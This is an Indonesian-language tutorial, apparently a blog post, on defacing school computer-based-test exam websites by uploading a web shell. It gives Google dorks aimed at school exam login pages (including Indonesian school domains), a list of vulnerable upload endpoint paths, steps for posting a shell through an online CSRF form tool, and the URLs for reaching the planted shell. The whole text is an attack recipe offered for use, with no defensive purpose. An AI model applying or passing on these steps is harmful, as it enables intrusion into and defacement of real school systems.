Assalamualaikum Brother
Heyy brother balik lagi sama saya kali ini gua bakal kasih tutorial cara Deface upload shell Poc CBT with csrf deface ini cukup mudah dan simpel..
Oke langsung saja cuk kecaranya...
Bahan-Bahan :
# Hp/Pc
# Internet
# Rokok & Kopi
# Otak
# Dork
# Exploit
# Shell/Sc Deface
NOTE : Ojo Lali Mletre Hehe
Dork:
inurl:/login.php inurl:/cbt
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:ujian online
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:cbt beesmart
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart
KEMBANGIN LAGI BIAR VULN !!!
Pertama kalian ngedork menggunakan dork di atas lalu cari target nya
Nah Kalo udah nemu target nya langsung aja kasih exploit nya di belakang site/path
www.site.com/exploit
www.site.com/path/exploit
Exploit:
/panel/pages/upload-file.php
/panel/pages/upload-logo.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload-banner.php
/panel/pages/upload_gambar.php
/panel/pages/upload-fotosiswa.php
Nah kalo webnya blank itu tanda nya vuln ya....
Langsung salin aja url webnya yg udh di kasih exploit lalu ke csrf online
CSRF Online (Kamu Bisa Pake Tools CSRF Yang Lian)
Nah lalu kamu tempel di url target untuk post file nya ketik uploadfile
Kalo udh langsung aja klik lock target/kunci target lalu upload shell kalian
Nah kalo berhasil di upload kamu tinggal Akses aja
Cara Aksesnya?
www.site.com/images/shell.php
www.site.com/pictures/shell php
www.site.com/video/shell.php
Jika ada path maka tambahin di belakang path
Done Berhasil!!!
Oke segitu aja tutor dari saya semoga bermanfaat sekian dan terima kasih :)